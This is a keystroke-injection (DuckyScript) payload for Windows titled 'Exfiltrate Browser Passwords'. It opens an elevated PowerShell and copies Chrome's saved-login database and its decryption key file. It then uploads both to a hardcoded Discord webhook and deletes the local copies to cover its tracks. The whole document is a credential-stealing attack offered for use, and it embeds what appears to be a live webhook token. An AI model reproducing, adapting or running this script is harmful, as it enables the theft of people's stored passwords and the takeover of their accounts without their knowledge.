REM ###########################################################
REM #                                                         |
REM # Title        : Exfiltrate Browser Passwords        |
REM # Author       : Zenin                                    |
REM # Version      : 1.0                                      |
REM # Category     : Credentials, Exfiltrate                  |
REM # Target       : Windows                                  |
REM #                                                         |
REM ##########################################################
DELAY 500
WINDOWS d
DELAY 500
WINDOWS r
DELAY 500
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 800
LEFTARROW
ENTER
DELAY 800
STRING $hookurl = "https://discord.com/api/webhooks/1164596165849927792/7ASILUXC1ya92O9OsNFDXhVS_MBFOkTZWlBLVaTtzVwXeO8jz1_IGi5w82goz88vProJ"
ENTER
DELAY 300
STRING $sourceFile1 = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data"; $outputFile1 = "$([System.Environment]::GetFolderPath('Desktop'))\output.txt"; Copy-Item $sourceFile1 $outputFile1; Upload-Discord -file $outputFile1 -text ":)"; Remove-Item $outputFile1; $sourceFile2 = "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State"; $outputFile2 = "$([System.Environment]::GetFolderPath('Desktop'))\key.txt"; Copy-Item $sourceFile2 $outputFile2; Upload-Discord -file $outputFile2 -text "Key-File"; Remove-Item $outputFile2
ENTER
DELAY 1000
STRING exit
ENTER
